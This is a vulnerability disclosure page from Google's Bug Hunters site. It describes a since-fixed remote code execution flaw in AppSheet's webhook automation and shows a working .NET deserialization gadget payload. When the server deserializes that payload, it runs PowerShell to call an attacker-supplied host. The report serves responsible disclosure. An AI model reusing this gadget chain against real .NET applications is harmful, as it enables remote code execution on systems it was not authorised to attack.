Skip to Content (Press Enter)
Google
Bug Hunters
Deserialization RCE in AppSheet
Reported by:
Chip
Google VRP
triaged
00:23 | Sep 20, 2022
accepted
02:06 | Sep 29, 2022
fixed
08:11 | Oct 31, 2022
reward decided
$10,000
Summary:
Deserialization RCE in AppSheet
Product:
AppSheet
URL:
https://www.appsheet.com
Vulnerability type:
Remote Code Execution (RCE)
Details
In the Automation section of AppSheet, it is possible to create a custom bot that can call the webhook located on the URL specified by the user (HTTP request). It is also possible to provide custom body data for this request and it is unsafely deserialized by the application.
POC
: create a monthly scheduled bot with a step that will call webhook making HTTP POST request on any URL with this body (also in attached
payload.txt
file), replacing
your_http_server_domain
with yours:
{'$type':'System.Windows.Data.ObjectDataProvider, PresentationFramework, Version=4.0.0.0, Culture=neutral, PublicKeyToken=31bf3856ad364e35','MethodName':'Start','MethodParameters':{'$type':'System.Collections.ArrayList, mscorlib, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089','$values':[**'cmd', '/c powershell -command "Invoke-WebRequest -URI your_http_server_domain"'**]},'ObjectInstance':{'$type':'System.Diagnostics.Process, System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089'}}
You will see in the server's logs the request was triggered by PowerShell code executed on the AppSheet server.
Also, you can see successful exploitation on the attached video
AppSheet_Decerialization_RCE.mp4
.
Attack scenario
Any remote attacker can achieve RCE in Google infrastructure
登录
使用 Google 账号登录